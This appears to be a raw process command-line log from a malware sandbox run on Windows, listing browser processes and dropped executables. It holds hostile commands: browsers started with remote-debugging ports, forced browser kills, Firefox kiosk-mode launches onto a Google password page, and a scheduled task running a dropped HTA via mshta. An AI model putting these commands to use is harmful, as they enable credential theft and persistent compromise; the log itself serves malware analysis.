C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3488 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4872 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99db4cc40,0x7ff99db4cc4c,0x7ff99db4cc58

C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe

"C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2644 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4872 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3660 /prefetch:2

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe

"C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99d3646f8,0x7ff99d364708,0x7ff99d364718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,744869653311441985,16062956415993869617,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99d3646f8,0x7ff99d364708,0x7ff99d364718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 960"

C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe

"C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2628 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2848 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3268 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2620 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5008 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3632 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe

"C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe"

C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe

"C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2380 -ip 2380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 2508

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe

"C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1944 -prefsLen 27446 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6ad0898-2474-4064-80a5-208c64fe6cd3} 5324 "\\.\pipe\gecko-crash-server-pipe.5324" gpu

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99da546f8,0x7ff99da54708,0x7ff99da54718

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 28366 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf4158b1-cb35-4363-8607-9bfc511fd242} 5324 "\\.\pipe\gecko-crash-server-pipe.5324" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3156 -childID 1 -isForBrowser -prefsHandle 3184 -prefMapHandle 3172 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cde9da2-5705-47dd-8825-a34801ab3914} 5324 "\\.\pipe\gecko-crash-server-pipe.5324" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 960"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2812 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3532 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe

"C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3632 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2092 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn fD235maYYx8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\zAZE3yTrd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\zAZE3yTrd.hta

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10110400121\am_no.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

